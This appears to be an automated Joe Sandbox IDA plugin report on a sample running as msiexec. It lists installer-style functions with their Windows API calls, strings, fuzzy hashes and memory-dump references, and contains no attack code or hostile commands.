Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: 127149d4f0cce16dfe4a3af1efdcab4b76b2a353eb8979ce4d539156ac24bc73
Instruction ID: 62f2159171fbc9033078dd1539b67ba065abfcd1800d5973976be9d0b9eda31e
Opcode Fuzzy Hash: 127149d4f0cce16dfe4a3af1efdcab4b76b2a353eb8979ce4d539156ac24bc73
Instruction Fuzzy Hash: DE319F71C00128BBDF216FA5CD89EAE7E78EF04364F10422AF524772E0C7795D419BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404DAA Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(004297B8,00000000,0041D988,756F110C,?,?,?,?,?,?,?,?,?,00402FB6,00000000,?), ref: 00404DE3
lstrlenA.KERNEL32(00402FB6,004297B8,00000000,0041D988,756F110C,?,?,?,?,?,?,?,?,?,00402FB6,00000000), ref: 00404DF3
lstrcatA.KERNEL32(004297B8,00402FB6,00402FB6,004297B8,00000000,0041D988,756F110C), ref: 00404E06
SetWindowTextA.USER32(004297B8,004297B8), ref: 00404E18
SendMessageA.USER32 ref: 00404E3E
SendMessageA.USER32 ref: 00404E58
SendMessageA.USER32 ref: 00404E66

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 50dbff66748b602f0133f4c5fc9f36e40697bbb7724bf87a113127d5fb299ab7
Instruction ID: 64f14355eea1465708e63b557f2fc924fecf56a011f776fb8de10cf69f9f2b8c
Opcode Fuzzy Hash: 50dbff66748b602f0133f4c5fc9f36e40697bbb7724bf87a113127d5fb299ab7
Instruction Fuzzy Hash: F7216071A00118BBDB119FA9DD85ADEBFA9FF44354F14807AF904B6290C7398E418F98

Uniqueness

Uniqueness Score: -1.00%

Function 00404679 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32 ref: 00404694
GetMessagePos.USER32 ref: 0040469C
ScreenToClient.USER32(?,?), ref: 004046B6
SendMessageA.USER32 ref: 004046C8
SendMessageA.USER32 ref: 004046EE

Strings

f, xrefs: 004046CA

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
Instruction ID: b5388fb2048f9adb4f66bcd81e9da03b2d8faafec29f08353259a6dacb87349b
Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
Instruction Fuzzy Hash: 0E014071D00219BADB00DB94DC45BEEBBB8AB59711F10016ABA11B61C0D7B865418BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402B3B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B56
MulDiv.KERNEL32 ref: 00402B81
wsprintfA.USER32 ref: 00402B91
SetWindowTextA.USER32(?,?), ref: 00402BA1
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BB3

Strings

verifying installer: %d%%, xrefs: 00402B8B

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: fb9d5c419c19e2bdb6c378f6819b1ebc1dc21d5e7d0f0b4f2b85ce684f360012
Instruction ID: 3d98ddf4d84b742d5460afe4edfb6d9be597fa80bf04213b3bc288f28cb5f5da
Opcode Fuzzy Hash: fb9d5c419c19e2bdb6c378f6819b1ebc1dc21d5e7d0f0b4f2b85ce684f360012
Instruction Fuzzy Hash: 82014470A40209ABDB209F60DD09FAE3779BB04345F008039FA06A92D1D7B8AA558F99

Uniqueness

Uniqueness Score: -1.00%

Function 00401F51 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F7C

Part of subcall function 00404DAA: lstrlenA.KERNEL32(004297B8,00000000,0041D988,756F110C,?,?,?,?,?,?,?,?,?,00402FB6,00000000,?), ref: 00404DE3
Part of subcall function 00404DAA: lstrlenA.KERNEL32(00402FB6,004297B8,00000000,0041D988,756F110C,?,?,?,?,?,?,?,?,?,00402FB6,00000000), ref: 00404DF3
Part of subcall function 00404DAA: lstrcatA.KERNEL32(004297B8,00402FB6,00402FB6,004297B8,00000000,0041D988,756F110C), ref: 00404E06
Part of subcall function 00404DAA: SetWindowTextA.USER32(004297B8,004297B8), ref: 00404E18
Part of subcall function 00404DAA: SendMessageA.USER32 ref: 00404E3E
Part of subcall function 00404DAA: SendMessageA.USER32 ref: 00404E58
Part of subcall function 00404DAA: SendMessageA.USER32 ref: 00404E66

LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
GetProcAddress.KERNEL32(00000000,?,?,00000008,00000001,000000F0), ref: 00401F9C
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402007

Strings

B, xrefs: 00401FC7

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID: B
API String ID: 2987980305-3806887055
Opcode ID: 490023839bc4c26c6d0a328ae6bba471d879ed123e61d6ca81d8e7277a746500
Instruction ID: bf94c0598684f4a2e8798aed6ecd64900ad0f6fcd097f114c8a1beddd358b100
Opcode Fuzzy Hash: 490023839bc4c26c6d0a328ae6bba471d879ed123e61d6ca81d8e7277a746500
Instruction Fuzzy Hash: 5121EE72D04216EBCF107FA5CE49A6E75B06F45358F20433BF511B62E1C77C4941A65E

Uniqueness

Uniqueness Score: -1.00%

Function 00402303 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?), ref: 00402341
lstrlenA.KERNEL32(fd ,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402361
RegSetValueExA.ADVAPI32(?,?,?,?,fd ,00000000), ref: 0040239A
RegCloseKey.ADVAPI32(?), ref: 0040247D

Strings

fd , xrefs: 00402352, 00402360, 00402374, 00402384, 0040238F

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: fd
API String ID: 1356686001-2313478379
Opcode ID: ef42d4d025d292edcb994c00818a1b6489968a05de1bb2656c7f8993eebe469d
Instruction ID: 74c2b7e5efa1a9b7d251dd878628ee018497e02546d33d1ea7114f4406d6c15c
Opcode Fuzzy Hash: ef42d4d025d292edcb994c00818a1b6489968a05de1bb2656c7f8993eebe469d
Instruction Fuzzy Hash: 721160B1E00209BFEB10AFA5DE89EAF767CFB40398F10453AF901B71D0D6B85D019669

Uniqueness

Uniqueness Score: -1.00%

Function 00402A36 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A57
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A93
RegCloseKey.ADVAPI32(?), ref: 00402A9C
RegCloseKey.ADVAPI32(?), ref: 00402AC1
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402ADF

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: b26b43b9b7666f40e9fdb218fe96b22a79156d573bb7d5cc257a1d138f5a7564
Instruction ID: 324dab2b24170647655e9dcbeda369d8ff673eed47d89bab0de13a8960c84090
Opcode Fuzzy Hash: b26b43b9b7666f40e9fdb218fe96b22a79156d573bb7d5cc257a1d138f5a7564
Instruction Fuzzy Hash: 4F115675A00008FFEF31AF91DE49DAB7B6DEB40384B104436FA05B10A0DBB59E51AE69

Uniqueness

Uniqueness Score: -1.00%

Function 00401CC1 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401CC5
GetClientRect.USER32 ref: 00401CD2
LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CF3
SendMessageA.USER32 ref: 00401D01
DeleteObject.GDI32(00000000), ref: 00401D10

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: c11a1326f806ce2ab61e5a3f1dc978ac0e24045f1205bc6e497a34a900bec79e
Instruction ID: f89edaf4e673e5a696cf4c500be88082f9c29b5fdabb6c66a10e118bddb835aa
Opcode Fuzzy Hash: c11a1326f806ce2ab61e5a3f1dc978ac0e24045f1205bc6e497a34a900bec79e
Instruction Fuzzy Hash: 71F01DB2E04105BFD700EBA4EE89DAFB7BDEB44345B104576F602F6190C678AD018B69

Uniqueness

Uniqueness Score: -1.00%

Function 00404597 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00429FE0,00429FE0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004044B7,000000DF,0000040F,00000400,00000000), ref: 00404625
wsprintfA.USER32 ref: 0040462D
SetDlgItemTextA.USER32(?,00429FE0), ref: 00404640

Strings

%u.%u%s%s, xrefs: 0040460F

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 308c210494ba65c8d6c58fead7846ea59173cd15c70e93c8128561061e7c40a4
Instruction ID: a73c68329ee831a229c644748369bffc84c82a565a353c3d841dc2820e0c3950
Opcode Fuzzy Hash: 308c210494ba65c8d6c58fead7846ea59173cd15c70e93c8128561061e7c40a4
Instruction Fuzzy Hash: 9911D0737001243BDB10A66D9C46EEF329ADBC6334F14023BFA25F61D1E9388C5286E8

Uniqueness

Uniqueness Score: -1.00%

Function 00401BAD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
SendMessageA.USER32 ref: 00401C25

Strings

!, xrefs: 00401BE1

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 5e77a80833e19dc55b8a20fadec5ab0659a97bc6c71de6bcb2193ca436d8299f
Instruction ID: e870f9960eb541ab862ab70d99fa676f0883abea00e9f1964bf1c40a5587cb5b
Opcode Fuzzy Hash: 5e77a80833e19dc55b8a20fadec5ab0659a97bc6c71de6bcb2193ca436d8299f
Instruction Fuzzy Hash: 3B21C4B1A44209BFEF01AFB4CE4AAAE7B75EF40344F14053EF602B60D1D6B84980E718

Uniqueness

Uniqueness Score: -1.00%

Function 0040526C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042BFE8,Error launching installer), ref: 00405291
CloseHandle.KERNEL32(?), ref: 0040529E

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040526C
Error launching installer, xrefs: 0040527F

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
API String ID: 3712363035-3894416041
Opcode ID: dc33ac1254d82063a7b9e43172f0f507123e59eb9c5a5fd92b1179a08dc1bdb0
Instruction ID: 9c205d3d1494e9e4afb0e3639077779a104ecf70f113e6d393e41fe649cd8d97
Opcode Fuzzy Hash: dc33ac1254d82063a7b9e43172f0f507123e59eb9c5a5fd92b1179a08dc1bdb0
Instruction Fuzzy Hash: FBE0ECB4A04209ABEB00EF64ED09D7B7BBCEB00304B408522A911E2290D778E410CEB9

Uniqueness

Uniqueness Score: -1.00%

Function 004054FF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403244), ref: 00405505
CharPrevA.USER32(?,00000000), ref: 0040550E
lstrcatA.KERNEL32(?,00409010), ref: 0040551F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004054FF

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-4017390910
Opcode ID: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
Instruction ID: dfec000a3f5bf2671270dd29e8f8c50a5f72ee918dd093ba8f25731816a648b4
Opcode Fuzzy Hash: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
Instruction Fuzzy Hash: FCD0A972705A307ED2022A19AC06F8F2A88CF17301B044822F100B62D2C23C9E418FFE

Uniqueness

Uniqueness Score: -1.00%

Function 00401EC5 Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401F24

Part of subcall function 0040596A: wsprintfA.USER32 ref: 00405977

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: 099a0aa409c47306a0e5e8436e4e2e7c61bc24b53b401cebe12c2d8cce08dfb0
Instruction ID: ac83c8b0d38e5b491d5bd27050ffdb4091974a4b49ad9b19d675067d3fb65d11
Opcode Fuzzy Hash: 099a0aa409c47306a0e5e8436e4e2e7c61bc24b53b401cebe12c2d8cce08dfb0
Instruction Fuzzy Hash: 201148B2900108BFDB01EFA5D981DAEBBB9EF04344B24807AF505F61E1D7389A54DB28

Uniqueness

Uniqueness Score: -1.00%

Function 00405593 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

CharNextA.USER32(ES@), ref: 004055A1
CharNextA.USER32(00000000), ref: 004055A6
CharNextA.USER32(00000000), ref: 004055B5

Strings

ES@, xrefs: 0040559C, 004055A0

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: CharNext
String ID: ES@
API String ID: 3213498283-1851447614
Opcode ID: 68c7f773aafbecf3834176a21eebbfbca0b4bda0270daf5a8c718fc322178301
Instruction ID: f60ec20427defc95a9886ae099bd540e39d30c8fbbaad3333d1940da6ed1a81e
Opcode Fuzzy Hash: 68c7f773aafbecf3834176a21eebbfbca0b4bda0270daf5a8c718fc322178301
Instruction Fuzzy Hash: F8F0A7A2D44B25B6E73222A84C44B6B6BADDB55711F244437E200B61D597B84C828FBA

Uniqueness

Uniqueness Score: -1.00%

Function 00401D1B Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

